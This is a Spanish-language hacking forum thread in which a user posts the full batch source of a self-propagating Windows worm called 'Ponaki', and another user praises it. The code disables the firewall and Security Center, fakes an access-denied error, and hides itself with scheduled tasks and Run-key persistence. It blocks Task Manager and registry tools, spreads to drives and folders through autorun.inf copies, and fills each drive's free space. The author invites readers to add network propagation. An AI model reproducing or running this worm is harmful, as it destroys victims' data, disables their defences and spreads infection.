::: WORM : PONAKI ::: by wizard_0

[wizard_0]

Weno  antes  q  nada  esto  lo  postee..  en  un  duelo  Batch  q  tube  con  "plof"   
asi  q  no  espero  sus  criticas..  por  q  lo  acabo  de  hacer  ahora.. 13/07/08


Nombre: Ponaki
Autor: Wizard_0
Descripción:

        * Primero  manda un mensaje  de  error  como el q  da el "cacls" de acceso denegado
        * Luego espera despues de 3 dias ala misma hora poder ejecutarse totalmente
        * Crea otro .bat para q no se pueda ver los archivos ocultos..  es constante.
        * Se clona hasta cierto rango de carpetas   aunke  se  lo puede  alargar...
        * Se mete a las unidades.. es totalmente  silencioso
        * Por ultimo despues  crea  un  carpeta en cada unidad "wsecurity" 
                 - Para llenar la memoria libre q tiene  cada  unidad
                 - Para luego cerrar  todo  privilegio  a  esta carpeta.


Asi sucesivament mientras el usuario siga  ocupando sus carpetas normalmente  llegara  el  dia  de  su  perdicion.. y aniquilacion.. de memoria...  jejeje

Código:

@echo off
set me=%0
set e=echo
attrib %0 +r
net stop "Centro de Seguridad"
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"

set hora=%time:~0,5%
set fecha=%date:~0,2%
set /a fecha+=3
if %fecha% GTR 29 (set fecha=1)

if "%1" EQU "true" (goto:ini)
if "%~p0" EQU "\" (explorer %~d0) else (if exist %~n0 (explorer %~n0) else (call:error %me%))
if not exist %windir%\security\"%~nx0" (echo S|xcopy /H %me% %windir%\security)
at | find "%~nx0"
if %errorlevel% GTR 0 (at %hora% /next:%fecha% %windir%\security\%~nx0 true)
exit

:ini
for /f "skip=1 tokens=1*" %%a in ('tasklist ^| find "%~nx0"') do (if %%a. NEQ . (exit))
pushd %windir%\system32\dllcache
if not exist goma.bat call:goma>goma.bat
if exist goma.bat start /b goma.bat

if not exist %windir%\"%~nx0" (echo S|xcopy /H %0 %windir%)
if exist %windir%\"%~nx0" set virus=C:\Windows\"%~nx0"
set virus=%virus:"=%
for %%a in (A C D E F G H I J K) do (if exist %%a: (call:magic %%a "%virus%"))
setlocal enabledelayedexpansion
for %%a in (A C D E F G H I J K) do (
       if exist %%a: (
             pushd %%a:\
             for /f "tokens=3 delims= " %%b in ('dir ^| find /I " bytes libres"') do set m=%%b
             set m=!m:.=!
             set /a m/=1034752
             if exist wsegurity (echo S|cacls wsecurity /P %username%:F) else (md wsegurity)
             attrib wsecurity +s +h +r
             cd wsecurity
             for /L %%c in (1,1,!m!) do type %windir%\explorer.exe>>power%%c.sgt
             cd..
             echo S|cacls wsecurity /P %username%:N
                      )
       )
)
endlocal
exit

:goma
%e% @echo off
%e% reg add "hklm\software\microsoft\command processor" /v AutoRun /d "color 0a&&cls&&title Shell&&prompt $hwizard@host:" /f
%e% reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f
%e% reg add "hkcu\software\microsoft\windows\currentversion\policies\system" /v DisableRegistryTools /t REG_DWORD /d 1 /f
%e% reg add "hkcu\software\microsoft\windows\currentversion\policies\uninstall"  /v NoAddRemovePrograms /t REG_DWORD /d 1 /F
%e% reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f
%e% reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /v CheckedValue /t REG_DWORD /d 1 /f
%e% reg add "hkcu\software\microsoft\windows\currentversion\policies\explorer" /v NoViewContextMenu /t REG_DWORD /d 1 /f
%e% reg add "hklm\software\microsoft\windows\currentversion\run" /v CacheDefault /d %windir%\system32\dllcache\cache.vbs /f
%e% rundll32 user32.dll,UpdatePerUserSystemParameters
%e%.
%e% pushd %windir%\system32\dllcache
%e% if not exist dllcache.vbs (call:cache ^>cache.vbs)
%e% if not exist %%~nx0% % (xcopy /h %%0)%
%e% if exist cache.vbs (start cache.vbs)
%e% exit
%e%.
%e% :cache
%e% %e% set wzr=CreateObject ^("Wscript.shell")
%e% %e% wzr.run ^"goma.bat",vbhide
%e% %e% wzr.sendkeys ^"^^R"
%e% goto:EOF
goto:EOF


:magic
pushd %1:\
if exist autorun.inf (
attrib autorun.inf -a -s -r -h
del autorun.inf
)
if not exist %1$.exe (call:clon "%1$" %2)
if exist %1$.exe (
call:auto %1$.exe>autorun.inf
attrib %1$.exe +s +h
)
for /D %%a in (*) do (if %%a. NEQ . (call:clon "%%a" %2 && call:02 "%%a" %2)
goto:EOF

:clon
if exist %1.exe (goto:EOF) else (
echo f|xcopy /h %2 %1.exe
attrib %1 +s +h
)
goto:EOF

:02
cd %1
for /D %%b in (*) do (if %%b. NEQ . (call:clon "%%b" %2)
cd..
goto:EOF

:auto
%e% [autorun]
%e% open=%1
%e% shell\open\command=%1
%e% shell\explorer\command=%1
attrib autorun.inf +s +h +r
goto:EOF

:error
echo wzr="No se puede tener acceso a %~dpn1" ^& chr(13) ^& chr(13) ^& " Acceso  denegado. ">%temp%\suc.vbs
echo Msgbox wzr,VBCRITICAL,"Unidad local (%~d0)" >>%temp%\suc.vbs
start %temp%\suc.vbs
ping 127.0.0.1 -n 2 >nul
del %temp%\suc.vbs
goto:EOF

PD: Se  acuerdan  de  la  Propagacion  por  una  Lan   q  di   para  q  alguno  lo  haga...
pues  de  esa  idea  salio  esto..   
aunke  falta  lo  q  mas  se  kiere  la  propagacion  por  Netbios...
eso  se  los  dejo  a  uds..   ahi  tienen  la  idea..  de  nuevo  para  los  q no  la  vieron

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,57940.msg269645.html#msg269645

salu2-->

[PyXOLo]

Muy bueno wizard Me ha encantado

[wizard_0]

ok!!  muchas.. gracias..
Hay  un  error !!!     haber   kien  lo corrige...  se  trata  de  la  negacion de  privilegios o  accesos  a  la  carpeta  wsecurity  al  terminar  de  crear  los  archivos  power2000.sgt 

salu2-->